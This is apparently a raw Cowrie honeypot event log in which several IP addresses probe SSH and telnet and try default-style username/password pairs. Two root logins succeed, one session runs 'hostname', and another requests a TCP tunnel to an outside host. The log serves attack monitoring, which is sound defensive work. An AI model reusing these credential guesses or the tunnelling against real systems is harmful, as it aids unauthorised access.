{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:36:35.357068Z","src_ip":"79.127.48.196","session":"6bd097722e47"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60726,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c283b0dcc35","protocol":"ssh","message":"New connection: 212.227.125.160:60726 (1.2.3.4:22) [session: 9c283b0dcc35]","sensor":"my-vps","timestamp":"2025-08-31T04:36:35.423596Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:36:35.424561Z","src_ip":"212.227.125.160","session":"9c283b0dcc35"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:36:35.616773Z","src_ip":"212.227.125.160","session":"9c283b0dcc35"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"letmein","message":"login attempt [oracle/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T04:36:35.774863Z","src_ip":"212.227.125.160","session":"c4ece09ffd2a"}
{"eventid":"cowrie.login.failed","username":"mongo","password":"123456","message":"login attempt [mongo/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:36:36.195146Z","src_ip":"212.227.125.160","session":"9c283b0dcc35"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:36:37.122072Z","src_ip":"212.227.125.160","session":"c4ece09ffd2a"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:36:37.389219Z","src_ip":"212.227.125.160","session":"9c283b0dcc35"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52904,"dst_ip":"1.2.3.4","dst_port":22,"session":"4eb63a2d200b","protocol":"ssh","message":"New connection: 212.227.125.160:52904 (1.2.3.4:22) [session: 4eb63a2d200b]","sensor":"my-vps","timestamp":"2025-08-31T04:36:40.624834Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:36:40.625858Z","src_ip":"212.227.125.160","session":"4eb63a2d200b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:36:40.814728Z","src_ip":"212.227.125.160","session":"4eb63a2d200b"}
{"eventid":"cowrie.login.failed","username":"user","password":"111111","message":"login attempt [user/111111] failed","sensor":"my-vps","timestamp":"2025-08-31T04:36:41.384256Z","src_ip":"212.227.125.160","session":"4eb63a2d200b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52490,"dst_ip":"1.2.3.4","dst_port":22,"session":"963dfef37502","protocol":"ssh","message":"New connection: 212.227.235.229:52490 (1.2.3.4:22) [session: 963dfef37502]","sensor":"my-vps","timestamp":"2025-08-31T04:36:42.026971Z"}
{"eventid":"cowrie.session.closed","duration":"56.9","message":"Connection lost after 56.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:36:42.188419Z","src_ip":"212.227.235.229","session":"9ec50a3ab108"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:36:42.574331Z","src_ip":"212.227.125.160","session":"4eb63a2d200b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:36:49.767080Z","src_ip":"212.227.235.229","session":"963dfef37502"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:36:49.767967Z","src_ip":"212.227.235.229","session":"963dfef37502"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35074,"dst_ip":"1.2.3.4","dst_port":22,"session":"575cd103148e","protocol":"ssh","message":"New connection: 212.227.125.160:35074 (1.2.3.4:22) [session: 575cd103148e]","sensor":"my-vps","timestamp":"2025-08-31T04:36:51.108035Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:36:51.109135Z","src_ip":"212.227.125.160","session":"575cd103148e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:36:51.298242Z","src_ip":"212.227.125.160","session":"575cd103148e"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin123","message":"login attempt [gpadmin/gpadmin123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:36:51.868925Z","src_ip":"212.227.125.160","session":"575cd103148e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36272,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed0b406c7295","protocol":"ssh","message":"New connection: 212.227.125.160:36272 (1.2.3.4:22) [session: ed0b406c7295]","sensor":"my-vps","timestamp":"2025-08-31T04:36:52.943876Z"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:36:53.061059Z","src_ip":"212.227.125.160","session":"575cd103148e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:36:53.667197Z","src_ip":"212.227.125.160","session":"ed0b406c7295"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:36:53.667865Z","src_ip":"212.227.125.160","session":"ed0b406c7295"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60588,"dst_ip":"1.2.3.4","dst_port":23,"session":"6757bce91056","protocol":"telnet","message":"New connection: 212.227.235.229:60588 (1.2.3.4:23) [session: 6757bce91056]","sensor":"my-vps","timestamp":"2025-08-31T04:36:58.708910Z"}
{"eventid":"cowrie.login.success","username":"root","password":"6","message":"login attempt [root/6] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:36:58.843978Z","src_ip":"212.227.125.160","session":"ed0b406c7295"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51032,"dst_ip":"1.2.3.4","dst_port":22,"session":"d43fabc80373","protocol":"ssh","message":"New connection: 212.227.125.160:51032 (1.2.3.4:22) [session: d43fabc80373]","sensor":"my-vps","timestamp":"2025-08-31T04:37:01.656606Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:37:01.657731Z","src_ip":"212.227.125.160","session":"d43fabc80373"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:37:01.845746Z","src_ip":"212.227.125.160","session":"d43fabc80373"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:37:02.205547Z","src_ip":"212.227.125.160","session":"ed0b406c7295"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T04:37:02.206516Z","src_ip":"212.227.125.160","session":"ed0b406c7295"}
{"eventid":"cowrie.login.failed","username":"esroot","password":"esroot","message":"login attempt [esroot/esroot] failed","sensor":"my-vps","timestamp":"2025-08-31T04:37:02.426435Z","src_ip":"212.227.125.160","session":"d43fabc80373"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:37:03.467487Z","src_ip":"212.227.125.160","session":"ed0b406c7295"}
{"eventid":"cowrie.session.closed","duration":"10.5","message":"Connection lost after 10.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:37:03.468688Z","src_ip":"212.227.125.160","session":"ed0b406c7295"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50899,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d6914870715","protocol":"ssh","message":"New connection: 212.227.125.160:50899 (1.2.3.4:22) [session: 5d6914870715]","sensor":"my-vps","timestamp":"2025-08-31T04:37:03.511366Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:37:03.512444Z","src_ip":"212.227.125.160","session":"5d6914870715"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:37:03.616167Z","src_ip":"212.227.125.160","session":"d43fabc80373"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51142,"dst_ip":"1.2.3.4","dst_port":22,"session":"3907d4ab71fd","protocol":"ssh","message":"New connection: 212.227.125.160:51142 (1.2.3.4:22) [session: 3907d4ab71fd]","sensor":"my-vps","timestamp":"2025-08-31T04:37:03.622565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:37:03.623111Z","src_ip":"212.227.125.160","session":"3907d4ab71fd"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T04:37:03.735311Z","src_ip":"212.227.125.160","session":"3907d4ab71fd"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:37:04.073511Z","src_ip":"212.227.125.160","session":"3907d4ab71fd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T04:37:04.186603Z","session":"3907d4ab71fd"}
{"eventid":"cowrie.session.connect","src_ip":"91.231.89.214","src_port":44351,"dst_ip":"1.2.3.4","dst_port":23,"session":"199a75eb2302","protocol":"telnet","message":"New connection: 91.231.89.214:44351 (1.2.3.4:23) [session: 199a75eb2302]","sensor":"my-vps","timestamp":"2025-08-31T04:37:07.701397Z"}
{"eventid":"cowrie.session.closed","duration":0.18120265007019043,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:37:07.882529Z","src_ip":"91.231.89.214","session":"199a75eb2302"}
{"eventid":"cowrie.session.connect","src_ip":"91.231.89.86","src_port":52977,"dst_ip":"1.2.3.4","dst_port":23,"session":"2edb4f341a36","protocol":"telnet","message":"New connection: 91.231.89.86:52977 (1.2.3.4:23) [session: 2edb4f341a36]","sensor":"my-vps","timestamp":"2025-08-31T04:37:07.902528Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37272,"dst_ip":"1.2.3.4","dst_port":22,"session":"44c4edd62c19","protocol":"ssh","message":"New connection: 212.227.235.229:37272 (1.2.3.4:22) [session: 44c4edd62c19]","sensor":"my-vps","timestamp":"2025-08-31T04:37:11.356816Z"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":59676,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5e97da419aa","protocol":"ssh","message":"New connection: 201.148.180.50:59676 (1.2.3.4:22) [session: c5e97da419aa]","sensor":"my-vps","timestamp":"2025-08-31T04:37:11.379520Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:37:12.077300Z","src_ip":"212.227.235.229","session":"44c4edd62c19"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:37:12.078031Z","src_ip":"212.227.235.229","session":"44c4edd62c19"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:37:12.699750Z","src_ip":"201.148.180.50","session":"c5e97da419aa"}
